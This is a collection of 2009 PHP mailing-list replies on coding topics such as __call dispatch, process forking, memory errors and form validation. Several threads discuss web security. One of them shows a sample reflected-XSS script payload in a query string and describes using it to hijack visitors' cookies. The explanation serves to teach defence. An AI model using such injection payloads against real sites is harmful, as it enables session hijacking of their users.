Daniel Brown schreef: On Fri, Mar 20, 2009 at 14:29, Ginkga Studio, LLC webdes...@ginkga.com wrote: LOL @ JOCHEM'S DOMAIN NAME (HENCE SELF-IMPOORTANCE)AND LOL @ JOCHEMS LACK OF ABILITY IN THE AREA OF SPELLING. (IT'S SPELLED HERE - NOT HEAR) Point #1: Spelling. SO JOCHEM MY DEA, PLEASEBEFORE YOU REBUKE SOMEONE ELSE'S EFFORTS Point #2: Spelling and asinine remarks backfired. Checkmate. lol. Dan, the least you could have done was reply in CAPS ;-) PS: I guess a reply about the domain name referencing nisargadatta or krishnamurti wouldn't really ring any bells. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] dynamicaly append method to class - workaround for aggregate_methods()
Karel Kozlik schreef: But there still remains two issues: 1. How to pass arguments to method? The number of arguments is different for each method. So is the only way to construct a string containing the arguments and use eval()? Or is there an another way? then use call_user_func() and/or call_user_func_array() inside __call(), I tryed it, but it unfortunately does not work. In this case the method is called in static context and the $this is not avaiable in the method. I tryed both: call_user_func_array(array($class, $method), $args); and call_user_func_array($class.::.$method, $args); oh yeah d'oh. silly me, that's why I suggested the php5.3+ syntax in the first place. although given the seemingly 'broken' (mho) design and infinite variations that are possible in terms of method argument invocation you might consider tackling the whole system from a wider perspective (probably not what you want to hear I guess) also see: http://bugs.php.net/bug.php?id=40694 basically the by-ref issue is not, seemingly, really solvable - I'd say using by-ref in most cases is unwarranted anyway ... but, you may be able to work round it by using a static variable inconjunction with a, second, retrieval method in the decorating classes that overcome the requirement for by-ref ... if that makes sense. Hmmm I am not sure if I understand correctly, but I guess the use of second, retrieval method will require changes in all methods that use the by-ref arguments and also at all places where these methods are called. Am I right? that's what I meant. Better doing this I will think how to change the whole design, but this is what I wanted to avoid. take a look at interfaces, with the intention that you normalize the method signatures. additionally take a hard look as to whether you needs so many 'decorator' classes, I can imagine that there will be quite a bit of code that can be refactored into something more generic. big job, but it keeps you off the street ;-) thanks for your help K. looks like you have your work cut out for you! 2. Arguments sometimes need to be passed by reference. It seems that __call() does not support passing arguments by reference :(. So I have not idea how workaround it. thanks, Karel Jochem Maas napsal(a): Karel Kozlik schreef: Hello list! I am using in my application dynamic method appending to class with aggregate_methods() function. But this function is no more aviable in php5 and runkit extension seems not to be maintained any more. So I would like to replace it with something more common (__call method or so). Just to describe the situation (simplified). There is one common class containing some common functions: class DataLayer{ function add_method($method){ aggregate_methods($this, DataLayer_.$method); } function common_funct_foo(){ ... } function common_funct_bar(){ ... } } And there is hundreds of data manipulation methods (defined within separate classes) which could call common functions. E.g.: class DataLayer_get_items{ function get_items(){ $this-common_funct_foo(); return something; } } And they could also call other dynamicaly added methods: class DataLayer_update_attr{ function update_attr(){ $this-get_items(); $this-common_funct_bar(); return; } } All the stuff is used e.g. in this way: $data = new DataLayer(); $data-add_method('get_items'); $data-add_method('update_attr'); $data-update_attr(); Now the question is whether is it possible to somehow replace functionality of add_method() without aggregate_methods() or runkit_class_adopt(). And _WITHOUT_ need to change the hundreds of DataLayer_* classes. The change should be only in the main DataLayer class. I was thinking about __call() method, but I do not know how to deal with the $this in dynamicaly appended functions. I need somehow make to $this in these functions reference to instance of DataLayer class. __call() will allow you to do this, although you will need php5.3: ?php class DataLayer_update_attr { function update_attr() { echo __METHOD__, \n; $this-common_funct_bar(); $this-get_items(); return; } } class DataLayer { function common_funct_foo() { echo __METHOD__, \n; /* ... */ } function common_funct_bar() { echo __METHOD__, \n; /* ... */ } function __call($method, $args) { $class = DataLayer_{$method}; echo __METHOD__, ... trying {$class}::{$method}()\n; if (!class_exists($class, true)) // trigger autoload throw new Exception(buddy we don't have a $class, so $method is not callable); $class::$method(); } } $d = new DataLayer; $d-update_attr(); ? - output -- [22:11:16] jochem::~/test ~/src/php5.3-200808312030/sapi/cli/php -n -f
Re: [PHP] [News] Affordable Independent Web Developer - Search Engine Optimization Services - March 19th, 2009
Daniel Brown schreef: On Fri, Mar 20, 2009 at 15:23, James Ausmus james.ausmus.li...@gmail.com wrote: OK, umm... Wow. Bi-polar, anyone??? I'm getting whiplash reading this thread. Not to say it isn't entertaining... ;) You like this? Ask the regulars about Crayon Shin Chan. ;-P Fond Memories Indeed! Ps. Dan, Tell Me Any Time You Want Me To Stop Writing In Ucfirst() :-D -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Site Security issue
Dotan Cohen schreef: Someone hacked your server. Report it to the server admin. more likely that someone hacked the site, i.e. the site has some insecure stuff in it that's allowing code to be uploaded and run. I would suspect that as more likely than the server itself being hacked. alternatively if go-daddy runs their webserver as a single user (as opposed to using CGI or suexec) then maybe someone else with an account is running a script that is adding crap to other sites php pages, this is also possible. the 'solution' would be to make all php files readonly for everyone but the fileowner (which should be the user linked to your webhosting account) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] dynamicaly append method to class - workaround for aggregate_methods()
Karel Kozlik schreef: Hello list! I am using in my application dynamic method appending to class with aggregate_methods() function. But this function is no more aviable in php5 and runkit extension seems not to be maintained any more. So I would like to replace it with something more common (__call method or so). Just to describe the situation (simplified). There is one common class containing some common functions: class DataLayer{ function add_method($method){ aggregate_methods($this, DataLayer_.$method); } function common_funct_foo(){ ... } function common_funct_bar(){ ... } } And there is hundreds of data manipulation methods (defined within separate classes) which could call common functions. E.g.: class DataLayer_get_items{ function get_items(){ $this-common_funct_foo(); return something; } } And they could also call other dynamicaly added methods: class DataLayer_update_attr{ function update_attr(){ $this-get_items(); $this-common_funct_bar(); return; } } All the stuff is used e.g. in this way: $data = new DataLayer(); $data-add_method('get_items'); $data-add_method('update_attr'); $data-update_attr(); Now the question is whether is it possible to somehow replace functionality of add_method() without aggregate_methods() or runkit_class_adopt(). And _WITHOUT_ need to change the hundreds of DataLayer_* classes. The change should be only in the main DataLayer class. I was thinking about __call() method, but I do not know how to deal with the $this in dynamicaly appended functions. I need somehow make to $this in these functions reference to instance of DataLayer class. __call() will allow you to do this, although you will need php5.3: ?php class DataLayer_update_attr { function update_attr() { echo __METHOD__, \n; $this-common_funct_bar(); $this-get_items(); return; } } class DataLayer { function common_funct_foo() { echo __METHOD__, \n; /* ... */ } function common_funct_bar() { echo __METHOD__, \n; /* ... */ } function __call($method, $args) { $class = DataLayer_{$method}; echo __METHOD__, ... trying {$class}::{$method}()\n; if (!class_exists($class, true)) // trigger autoload throw new Exception(buddy we don't have a $class, so $method is not callable); $class::$method(); } } $d = new DataLayer; $d-update_attr(); ? - output -- [22:11:16] jochem::~/test ~/src/php5.3-200808312030/sapi/cli/php -n -f ./class_agg.php DataLayer::__call ... trying DataLayer_update_attr::update_attr() DataLayer_update_attr::update_attr DataLayer::common_funct_bar DataLayer::__call ... trying DataLayer_get_items::get_items() Fatal error: Uncaught exception 'Exception' with message 'buddy we don't have a DataLayer_get_items, so get_items is not callable' in /Users/jochem/test/class_agg.php:30 Stack trace: #0 [internal function]: DataLayer-__call('get_items', Array) #1 /Users/jochem/test/class_agg.php(11): DataLayer-get_items() #2 /Users/jochem/test/class_agg.php(32): DataLayer_update_attr-update_attr() #3 [internal function]: DataLayer-__call('update_attr', Array) #4 /Users/jochem/test/class_agg.php(37): DataLayer-update_attr() #5 {main} thrown in /Users/jochem/test/class_agg.php on line 30 Any ideas? many thanks, Karel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Built-in objects APC or serialization
you shouldn't start a new thread by replying to an existing one. also, you've already asked this question. Andrea Giammarchi schreef: I think I had some problem with this ML ... so I try again to write down my question: ... this is not paid support, asking a question garantees neither an answer nor a solution (actually, thinking about it, that probably not a good definition of 'paid support' either). I agree that this built-in stuff could be considered a weird case but I cannot believe that with all these new classes there is no solution to truly hibernate instances state. php doesn't care about what we believe. some research into the concept of 'shared nothing' may be in order to clarify why you hibernation wish is not supported out of the box. as for making an implementation, you've already answered your own question with __sleep, __wake Serializable As summary, I wonder if any of you knows a solution or, if any, when (and if) are you planning to add this feature. although I don't develop the php engine I think I can safely say nobody is planning this 'feature' (with you current definition I can only describe as nebulous). if you keep an eye on the current developments in php you'll realise that the core developers have their hands full already with a delayed 5.3, a stack of features slated for post 5.3 and a 'small' thing called php6 (native unicode implementation) Best Regards _ More than messages–check out the rest of the Windows Live™. http://www.microsoft.com/windows/windowslive/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Fork and zombies
Per Jessen schreef: Waynn Lue wrote: (Apologies for topposting, I'm on my blackberry). Hm, so you think exiting from the child thread causes the db resource to get reclaimed? Yeah, something like that. The connection is definitely closed when the child exits. I can confirm this. you definitely need to open a connection for each child process. if you require a db connection in the parent process, you should close it before forking (and then reopen it afterwards if you still need it). at least that's what I found I had to do when I ran into this. incidently my forking loop looks like this, very interested to know if Per can spot any obvious stupidity: $childProcs = array(); do { if (count($childProcs) = $maxChildProcs) { $site = array_shift($sites); $pid = pcntl_fork(); } else { // stay as parent, no fork, try to reduce number of child processes $site = null; $pid = null; } switch (true) { case ($pid === -1): cronLog(error: (in {$thisScript}), cannot initialize worker process in order to run {$script} for {$site['name']}); break; case ($pid === 0): // we are child $exit = 0; $output = array(); // do we want to exec? or maybe include? if ($doExec) { exec($script.' '.$site['id'], $output, $exit); } else { $output = inc($script); $output = explode(\n, $output); } if ($exit != 0) cronLog(error: (in {$thisScript}), {$script} reported an error ($exit) whilst processing for {$site['name']},); foreach ($output as $line) cronLog($line); exit($exit); break; default: // we are parent $childProcs[] = $pid; do { $status = null; while (pcntl_wait($status, WNOHANG | WUNTRACED) 1) usleep(5); foreach ($childProcs as $k = $v) if (!posix_kill($v, 0)) // send signal 'zero' to check whether process is still 'up' unset($childProcs[ $k ]); $childProcs = array_values($childProcs); if (count($sites)) break; // more sites to run the given script for if (!count($childProcs)) break; // no more sites to run the given script for and all children are complete/dead } while (true); break; } if (!count($sites)) break; // nothing more to do usleep(5); } while (true); /Per -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Fork and zombies
Per Jessen schreef: Jochem Maas wrote: Per Jessen schreef: Waynn Lue wrote: (Apologies for topposting, I'm on my blackberry). Hm, so you think exiting from the child thread causes the db resource to get reclaimed? Yeah, something like that. The connection is definitely closed when the child exits. I can confirm this. you definitely need to open a connection for each child process. if you require a db connection in the parent process, you should close it before forking (and then reopen it afterwards if you still need it). Yep, exactly my thinking. at least that's what I found I had to do when I ran into this. incidently my forking loop looks like this, very interested to know if Per can spot any obvious stupidity: I doubt it. I can't quite follow your code after the pcntl_wait where you've got a pcntl_kill(), but it looks like an insurance policy? just in case ? correct, from my reading the pcntl_kill() with a signal argument of zero should return true if it is *able* to send the signal (but it doesn't actually send anything), given that it's only checking it's own children the parent process must able to send them signals assuming they're not somehow dead ... so yeah, insurance policy :-) /Per -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How to catch fatal errors
Tanoor Dieng schreef: Hello every body, I'm currently working on a very high traffic web sites. I often get a fatal error in production about memory Allowed memory size of ... exhausted. Unfortunately, I can not reproduce this fatal error in developpement environment. The main reason for that is that I don't know the php script which causes the error. Php only tell me on which file, the error has appeared, but I don't know the orginal php script which were called. I've tried some hacks, like the register_shutdown_function one. This hack allows me to catch almost all fatal errors, except one which says Allowed memory site of ... Any idea about how to catch this error? you can't - the script dies due to not enough memory, there is nothing the script/engine can do at that point (any action would require some more memory). My main issue is to know script that has been called. reproduce it in development, this probably means you will have to: 1. setup webserver/php conf/ini indentically to production 2. setup the dev env with a copy of live data most likely your issue revolves around too large a dataset being read in during some requests in the production env (e.g. a way too large product list) in the interim increase the php memory_limit on the production server to mitigate the problem (know that this only works if your server has the memory available ... too many webserver processes running the php engine with too much memory allocated will eventually cause physical memory to run out with the consequence that the OS will start to swap memory to disk, which will quickly bring your server grinding to a halt) Best regards -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: The PHP filter class I'm working on (securiity)
Martin Zvarík schreef: What's the point? If user puts in a search input something like scriptalert('I am super hacker');/script And the website outputs: You are searching for: script/script then what? it shows an alert(), who cares? replace the alert() with some code that passes the cookie to a hacker controlled domain. now create a URL that includes the given javascript: echo 'http://mzvarik.com/foo?somevar='.urlencode('script type=text/javascript/*evil code here*//script'); send url to unsuspecting users of your site. anyone know clicks the URL has just had their cookies hijacked. still don't mind? I, as an owner of this website, don't mind AT ALL. Aha, forget to mention the XSS on MySQL or inside comments right? Isn't mysql_real_escape_string(), strip_tags() enough? Martin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: The PHP filter class I'm working on (securiity)
Martin Zvarík schreef: Jochem Maas napsal(a): Martin Zvarík schreef: What's the point? If user puts in a search input something like scriptalert('I am super hacker');/script And the website outputs: You are searching for: script/script then what? it shows an alert(), who cares? replace the alert() with some code that passes the cookie to a hacker controlled domain. now create a URL that includes the given javascript: echo 'http://mzvarik.com/foo?somevar='.urlencode('script type=text/javascript/*evil code here*//script'); send url to unsuspecting users of your site. anyone know clicks the URL has just had their cookies hijacked. still don't mind? AHA, I see. There's a PHP configuration that cookies are available on HTTP side only, that should provide the desired security in this case, right? only if you assume there is no bug in the browser allowing the attacker to circumvent that (the http cookie exists by definition on the client), and only if you assume stealing cookies is the only malign action an attacker might wish to take. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Anyone fancy getting paid to improve my PHP in London?
Robert Cummings schreef: On Fri, 2009-03-13 at 17:16 +, Tom Chubb wrote: Do any experienced PHP programmers in London fancy helping me improve my PHP? I'd like to know where my code could be improved and to be shown how an experienced programmer would approach a new site. I'd rather pay the right person a high amount than find someone cheap! Thanks, Send me a blank cheque-- if it clears then I'll get back to you... from someplace warm... by a beach while drinking martinis... and getting a massage... from more than one lady... should we forward this to your wife now, or after the check clears? Cheers, Rob. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP 5.2.9 - 5.2.9-1 and curl
Niki schreef: Hi all, I'm using PHP 5.2.9 on a Windows dedicated server. Could you kindly confirm me that I have to update to PHP 5.2.9-1 (http://www.php.net/archive/2009.php#id2009-03-10-1) only if I have curl extension enabled (extension=php_curl.dll in php.ini) ? If I run a phpinfo() on my webserver, no curl section is shown (no extension=php_curl.dll in php.ini). So, is my configuration (Windows 2003 Server - PHP 5.2.9) safe? as far as the curl issue is concerned, yes, I believe so. I'm sure that the php core doesn't use curl in it's core, you don't use it and it's not activated, so nothing to worry about. obviously some may say the 'Windows 2003 Server' part might not be so secure ... but that's a different flame war. Thank you. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP 5.2.9 - 5.2.9-1 and curl
Niki schreef: Thijs Lensselink ha scritto: Niki wrote: Hi all, I'm using PHP 5.2.9 on a Windows dedicated server. Could you kindly confirm me that I have to update to PHP 5.2.9-1 (http://www.php.net/archive/2009.php#id2009-03-10-1) only if I have curl extension enabled (extension=php_curl.dll in php.ini) ? Well nobody forces you to upgrade. But it would be wise. Now the bug in curl is still fresh in your mind. But if you forget and decide to enable it later. Big chance you vulnerable to some sort of attack. (...) However, do you confirm that the vulnerability (with ext/curl activated) is exploitable running a malicious php script only? The attacker needs to upload to the server that uses the extension libcurl a php page that uses CURLOPT_FOLLOWLOCATION, isn't it? If FTP access is correctly protected and the other applications on the server do not allow uploading the malicious php script is not possibile to make an attack, even if libcurl is enabled. Is it correct? essentially, yes. note that if someone can upload a script and run it, a bug in curl in the least of your worries. you have already been owned. the curl issue is more pertinent to situations where one is using curl with CURLOPT_FOLLOWLOCATION (which seems like you'd want to use it normally) and an attacker has some idea about how to be on the receiving end of the curl call ... there by allowing them to make your curl call eat some nasty url (which may cause you to disclose sensitive info the the callee, that was intended, for example, for a ligitemate webservice ... at least that's the way I understand it (hopefully someone will correct me if I've got my wires crossed) P.S. please use a valid email address. Thank you! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP 5.2.9 - 5.2.9-1 and curl
Andrew Ballard schreef: On Thu, Mar 12, 2009 at 12:39 PM, Niki u...@domain.invalid wrote: Jochem Maas ha scritto: essentially, yes. note that if someone can upload a script and run it, a bug in curl in the least of your worries. you have already been owned. Yes, obviously. :D I agree with you. :) the curl issue is more pertinent to situations where one is using curl with CURLOPT_FOLLOWLOCATION (which seems like you'd want to use it normally) and an attacker has some idea about how to be on the receiving end of the curl call ... there by allowing them to make your curl call eat some nasty url (which may cause you to disclose sensitive info the the callee, that was intended, for example, for a ligitemate webservice ... at least that's the way I understand it (hopefully someone will correct me if I've got my wires crossed) I'm not so sure that I've understood... The attack could be successful when libcurl extension is activated and there a php page on the server that accepts an URL from the client passing it to cURL function. Is it correct? If so, I think this could be considered only as an example of awful programming. Isn't it? yes, but the problem could also be due to DNS spoofing or some hijacking technique used on the server that one is talking to via curl, i.e. it's likely not something you can necessarily control via your own code. P.S. please use a valid email address. I never use valid e-mail address in order to protect me from spam. If there is a sort of manifesto that users must follow to send messages here I will surely specify my true e-mail address. Thank you very much again! ;) Not a manifesto, but the standard advice given to people who post to this list is to use Reply-All when replying to the list. If your address is invalid, people will have to manually remove it from the list of recipients or else they will get a bounce response when it tries to send to your u...@domain.invalid address. which is annoying. people are fickle, you'd rather they didn't skip past your questions. we use Reply-All because hitting Reply doesn't reply to the list but to the OP ... and discussions should generally stay on the list. it basically comes down to 'just live with it', the spam that is, and make sure you have some decent filtering in place. Andrew -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] password field validation
Afan Pasalic schreef: Andrew Ballard wrote: On Thu, Mar 12, 2009 at 3:05 PM, Jason Todd Slack-Moehrle mailingli...@mailnewsrss.com wrote: Hi All, I have an input field with type=password. I am trying to do some error checking to see if the user puts a value in after they submit the form (i.e not left it blank) Here is what I have: on form: Password: input id=PASSWORD name=PASSWORD type=password size=15 In PHP error checking: if (empty($_POST[PASSSWORD])) { $GERROR=TRUE;} even though I am putting characters in the field before I submit I am always getting TRUE returned. This same tactic works for other fields I have that I need to make sure they put values in, just I have never done this before with a password field. What am I doing wrong? I just want to make sure they put something there! -Jason If that's a direct copy/paste from your actual code, there is an extra S in PASSWORD. Also, you should enclose the array key in quotes: if (empty($_POST['PASSWORD'])) { $GERROR='TRUE'; } Andrew try if trim() gives you any different result: if (empty(trim($_POST['PASSWORD']))) { $GERROR='TRUE'; } definitely gives a different result. $ php -r ' $r = ; var_dump(empty(trim($r)));' PHP Fatal error: Can't use function return value in write context in Command line code on line 2 you can only pass variables to empty() *not* expressions. afan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] This code using _GET exploitable
filtered schreef: Hi, we have script containing ? echo $_GET['studio'] ? let say I do: example.com/yourscript.php?studio=script type=text/javascriptalert('I am an evil haxor');/script excusing the fact that the query is not urlencoded, what happens on your site (replace domain and script name to match your site/script) and ? $cam = $_GET['cam']; if ($cam == '1') { echo 'img src=http://example.com; /'; } if ($_GET['cam'] === '1') echo 'img src=http://example.com; /'; no need to create the $cam var, and a little better to check for the exact value+type (===) ? Is this code prone to XSS attacks or for attacking the local webserver and if so, how? $cam isn't used anywhere else. -a -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non static function called as static one
Olivier Doucet schreef: Hello everyone, I'm wondering if the following behaviour is a bug or a feature. The case is quite complex, so let me explain my point of view. here is the source : ?php class MyTest { public function myfunc() { echo get_class($this); } } class MySecondTest { public function test() { MyTest::myfunc(); } } $test = new MySecondTest(); $test-test(); //output: MySecondTest ? Let me explain : In this case, $this is MySecondTest, which is relevant as it is the last object context. But to my mind, this code should not work like this. Imagine you are the developer of function MyTest. You want your code to interact with other classes and being bugproof. 'MyTest' class here seems OK: $this is expected to be 'MyTest' because function myfunc() is expected to be called in a non-static context. Programmer of the second function created this bug and this unattended behaviour. Maybe this can be done : 1/ Forbid calling the function in static context (How can I test this ? $this is not NULL there !). actually I thought that the engine died in situations like this. I don't see any change to the behaviour in 5.3 either. 2/ (or/and) Raise a warning or an error if a non static function is called as a static one develop with error_reporting set to E_ALL | E_STRICT, then you'll get a big fat warning about it 3/ Create two functions with the same name, one static and the other one not. Unfortunately, this can't be done (yet ?). will never happen (where 'never' = 'very very very long time, at the very least' What do you think ? What's your point of view on this ? I want your feedbacks before opening a bug ticket, as it is not strictly a bug... I think it's inconsistent implementation. I would classify it as a bug, especially given the general trend to strict/pure OO concepts in php. there maybe underlying technical issue with the engine that means this can't be easily fixed. I would suggest asking on internals to see what their opinion is. the pragmatic solution is to not call non-static functions using static syntax. Olivier -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] This code using _GET exploitable
Stuart schreef: Please include the list when replying unless you're looking to hire me! 2009/3/11 filtered zopyxfil...@googlemail.com On Wed, Mar 11, 2009 at 13:41, Stuart stut...@gmail.com wrote: 2009/3/11 filtered zopyxfil...@googlemail.com $_GET['cam'] looks fine. $_GET['studio'] is not. I could build a URL that would output a javascript tag to do anything I want from the security context of a page on your site. This is not good. Check out http://php.net/htmlentities and associated functions. More detailed question: is this code prone for attacking the local web/php-server? I agree that it is weak with respect to XSS. Not on the face of it, but we would need a lot more of your code to decide that for certain, something which goes way beyond the scope of this list. But I would ask the question why it matters? It's bad so fix it. If you really have code like this anywhere in your site, escape it. Escape stuff coming in and escape stuff going out. There are no exceptions. actually that should be: filter stuff coming in, escape stuff going out. where 'coming in' really means any input vector (reading from db, from a file, request input, etc) and 'going out' really means any output vector (writing to db, writing to file, outputting to browser, etc). note that the filtering escaping that you should be doing depends on the context/vector in question (you escape data differently when writing to the db as compared to outputting data.) welcome to the web: where everyday we take the golden rule of keeping data, code and presentation seperate ... and stick it in a blender (along with the data, the code and the presentation) ... successfully filtering/escaping data out here means making sense of the goop in the blender and 'doing the right thing' with it ... have fun with that, I know I don't :-) Ever. -Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non static function called as static one
Olivier Doucet schreef: Hi Jochem, 2/ (or/and) Raise a warning or an error if a non static function is called as a static one develop with error_reporting set to E_ALL | E_STRICT, then you'll get a big fat warning about it Yes, that's what I'm using right now. Although, that's not the highlighted problem. if your not gettting a 'Strict Warning' when calling a non-static method statically then error_reporting doesn't include E_STRICT. I tested this with your example code on the cmdline to make sure. [...] the pragmatic solution is to not call non-static functions using static syntax. Well, this is the answer I didn't want :) I here that alot :-) Thank you for your feedback ! Olivier -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non static function called as static one
Nathan Rixham schreef: Nathan Rixham wrote: Jochem Maas wrote: Olivier Doucet schreef: mental though, part of me wishes they'd forked php at 4 to save all the lame syntax and weirdness. after thought.. I wish they'd forked it to OO and procedural, then us OO guys could have phpoo and be happy, and the procedural guys could have php and be happy because the oo one contained the word poo. lol, and to think we'd be neck deep in it every day :-P :) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] More PHP Includes
Gary schreef: Thanks again for all the help. I created a simple page of all includes (header, menu, 3 columns). I mixed the file types up. The menu (projectseven PMM) I saved as a library item, works fine. Had an HTML file in there, but I am guessing that having 2 page declarations along with an extra set of head and body tags was playing havoc with the code, so I removed them. Same thing when I created a php page and saved it as filename.inc.php, so I removed all the declarations and tags, again seems to work fine. Also included a simple .txt file. I did get some strange results in that all of the tags were highlighted after the menu, and I had to remove and insert again to correct. So is this the best way, to create a php page, remove all of the html tags and page declarations and name it filename.inc.php? (I'm using DW CS3) I'm quite sure I don't understand any of that ... so I'd hazard a guess and so no it's not the best way Also, something I do not understand, I included a small txt file in a page of a customer and it shows fine, however this file is not on the server...is this normal? it's probably pointing to a file on your machine, e.g. file://C:/path/to/file.txt, that's something you see quite often with DW/FrontPage/insert WYSIWYG-PITA-editor here. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOM recursion
please keep replies on list ... I enjoy my beatings in public ... Joanne Lane schreef: On Tue, 2009-03-10 at 01:05 +0100, Jochem Maas wrote: yeah but those from php-women should know better :-) my eye keeps picking up php-women since I had a very nice chat with JRF (of phpwomen.org) at phpuk. Hi Jochem, I am sorry I did not get back to you earlier, as my 'weekend' is Monday and Tuesday. sorry for what? and what's a weekend? Please do not let this reflect poorly on phpwomen as they have been a did you notice the smiley? great help to me in starting PHP and your help led me to the final solution to get my code working as I needed, and I thank you for that. In future I will refrain from asking on this list and stay with the forums. why? this list beats any forum hands down :-) we have Pedantic Rob, the-guy-that-wrote-the-da-vinci-code, somone whose been programming since they were doing it with Rocks[tm] and a concentration of other high class php-wizards you won't find anywhere else outside of the internals group. ... oh and there's me. but you can't have everything. granted the humor's a little whack but you get used to it, before you know it 'your one of them'. Thank you again for you guidance no problem. :-) J -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] More PHP Includes
Gary schreef: I'm sorry you were not able to understand the questions, but thank you for trying. a few tips: 1. don't assume people know what 'projectseven PMM' 2. it's doubtful anyone worth their salt on this list uses or knows much about a mind-bending, soul-destroyer like DreamWeaver. 3. try your hand at building a page by hand using a simple text editor and copious ammounts of searching/reading about HTML structure ... doing it this way will help you to understand what goes wrong and why, when DW tries to 'help you'. The path to the include is not an absolute path. then it is on the server, somewhere on your php include_path. Jochem Maas joc...@iamjochem.com wrote in message news:49b6b6d8.7050...@iamjochem.com... Gary schreef: Thanks again for all the help. I created a simple page of all includes (header, menu, 3 columns). I mixed the file types up. The menu (projectseven PMM) I saved as a library item, works fine. Had an HTML file in there, but I am guessing that having 2 page declarations along with an extra set of head and body tags was playing havoc with the code, so I removed them. Same thing when I created a php page and saved it as filename.inc.php, so I removed all the declarations and tags, again seems to work fine. Also included a simple .txt file. I did get some strange results in that all of the tags were highlighted after the menu, and I had to remove and insert again to correct. So is this the best way, to create a php page, remove all of the html tags and page declarations and name it filename.inc.php? (I'm using DW CS3) I'm quite sure I don't understand any of that ... so I'd hazard a guess and so no it's not the best way Also, something I do not understand, I included a small txt file in a page of a customer and it shows fine, however this file is not on the server...is this normal? it's probably pointing to a file on your machine, e.g. file://C:/path/to/file.txt, that's something you see quite often with DW/FrontPage/insert WYSIWYG-PITA-editor here. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOM recursion
Jochem Maas schreef: Joanne Lane schreef: I am trying to create a class that recursively iterates over an array an creates XML tree to reflect a multidimensional array. I am not really a PHP coder, but am trying my hand. I've seen 'real coders' write stuff thats leagues worse. This is what I have so far. http://pastie.org/private/w75vyq9ub09p0uawteyieq I have tried a few methods, but I keep failing. Currently, all elements are appended to the root node. .. yes my pleasure, glad I could help, not a problem. phffft. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Line Break Problem
Stuart schreef: 2009/3/9 Alice Wei aj...@alumni.iu.edu I have a question regarding using line breaks in PHP. I have the code something like: echo 1 . \t . $x . \t . $y . \r\n; When I run the code, it looks like a whole blob of text, but when I use View Source, the line breaks are formatted then correctly. Anyone can please tell me if this is what this is supposed to be? If so, how can I get the user to see the line break as they are, do I have to use br? you can also wrap the output in question in a pre tag: pre 1 X Y 2 X Y /pre alternatively use the nl2br() function ... but that won't help with displaying the tabs. note that there is a difference between the output of your script (which you can view using 'View Source' when the output is sent to the browser) and the representation of that same source (by which I mean how the the source is rendered [in the browser, in this case). HTML rendering ignores tabs, carriage returns and multiple consecutive spaces found in the source (with the exception of the pre tag, possibly the code tag, additionally the CSS attribute 'whitespace', IIRC, can be used to force rendering all whitespace chars. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOM recursion
Nathan Rixham schreef: Jochem Maas wrote: Jochem Maas schreef: Joanne Lane schreef: I am trying to create a class that recursively iterates over an array an creates XML tree to reflect a multidimensional array. I am not really a PHP coder, but am trying my hand. I've seen 'real coders' write stuff thats leagues worse. This is what I have so far. http://pastie.org/private/w75vyq9ub09p0uawteyieq I have tried a few methods, but I keep failing. Currently, all elements are appended to the root node. .. yes my pleasure, glad I could help, not a problem. phffft. all too often the case man, I'm sure free-w...@lists.php.net points here yeah but those from php-women should know better :-) my eye keeps picking up php-women since I had a very nice chat with JRF (of phpwomen.org) at phpuk. oh well it was a nice little exercise in DOM, something I haven't fully mastered yet. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Unexplained Issue Using Regex
